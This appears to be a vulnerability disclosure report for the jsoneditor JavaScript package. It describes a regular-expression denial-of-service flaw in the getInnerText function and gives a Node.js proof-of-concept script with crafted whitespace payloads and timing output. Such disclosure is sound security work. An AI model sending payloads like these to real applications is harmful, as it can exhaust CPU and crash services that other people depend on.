✍️ Description

The jsoneditor package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/josdejong/jsoneditor/blob/c33544bf7de6f4af05b58c4072e28bc786fb3f45/src/js/util.js#L403

Put the below in a poc.js file and run with node

var regex = /\s*\n\s*/g;
for(var i = 1; i <= 500; i++) {
var time = Date.now();
var payload = "A"+" ".repeat(i*10000)+"Z"
regex.test(payload)
var time_cost = Date.now() - time;
console.log("Trim time : " + payload.length + ": " + time_cost+" ms");
}

Check the Output:

Trim time : 10002: 102 ms
Trim time : 20002: 421 ms
Trim time : 30002: 927 ms
Trim time : 40002: 1693 ms
Trim time : 50002: 2659 ms
Trim time : 60002: 3945 ms
Trim time : 70002: 5472 ms
Trim time : 80002: 7407 ms
Trim time : 90002: 8342 ms
Trim time : 100002: 10267 ms
Trim time : 110002: 13306 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.